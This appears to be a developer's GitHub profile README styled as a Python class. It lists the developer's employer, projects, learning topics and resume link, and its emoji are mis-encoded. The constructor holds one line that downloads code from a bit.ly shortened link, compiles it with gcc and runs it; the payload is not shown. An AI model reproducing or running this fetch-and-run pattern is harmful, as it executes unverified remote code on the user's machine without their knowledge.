class PROxZIMA:
def __init__(self):
subprocess.call("curl -sL 'bit.ly/pr0x21m4' | gcc -w -o name -xc - && ./name", shell=True)
self.bio = {
'- πΌ Iβm currently working for': {'Emerson' : 'https://www.emerson.com/en-us/global'},
'- π Iβm currently working on' : {'Contribution Hub' : 'https://github.com/PROxZIMA/ContributionManager',
'DarkSpider': 'https://github.com/PROxZIMA/DarkSpider',
'Prism' : 'https://github.com/PROxZIMA/prism'},
'- π± Iβm currently learning' : ['System Architecture', 'C++', 'Full Stack Development', 'Algo Trading'],
'- π¬ Ask me anything' : 'Β―\_(γ)_/Β―',
'- π¨βπ» My projects available at' : 'https://github.com/PROxZIMA?tab=repositories',
'- π Know about my experiences': 'https://proxzima.dev/resume',
'- β‘ Fun fact' : ('Proxima Centauri is a small, low-mass star located 4.2465 light-'
'years away from the Sun in the southern constellation of Centaurus.')
}
if __name__ == '__main__':
import subprocess, pprint
pprint.pprint(PROxZIMA().__dict__)
Outside GitHub :)





